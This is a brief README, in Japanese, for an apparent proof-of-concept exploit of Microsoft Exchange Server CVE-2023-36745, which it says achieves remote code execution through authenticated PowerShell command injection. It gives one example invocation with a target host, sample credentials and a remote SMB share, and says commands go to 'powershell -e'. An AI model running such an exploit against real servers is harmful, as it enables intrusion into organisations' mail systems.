
Microsoft Exchange Server RCE脆弱性CVE-2023-36745の概念実証エクスプロイト。認証されたPowerShellコマンドインジェクションを介したリモートコード実行を可能にします。
Microsoft Exchange Server CVE-2023-36745 RCE PoC。
例:
python3 exp.py -H exchange.webdxg.com -u webdxg.com\dddai -p 4IDF7LAU -s \\192.168.237.131\Shares\ -c calc.exe
コマンドは powershell -e に渡されます。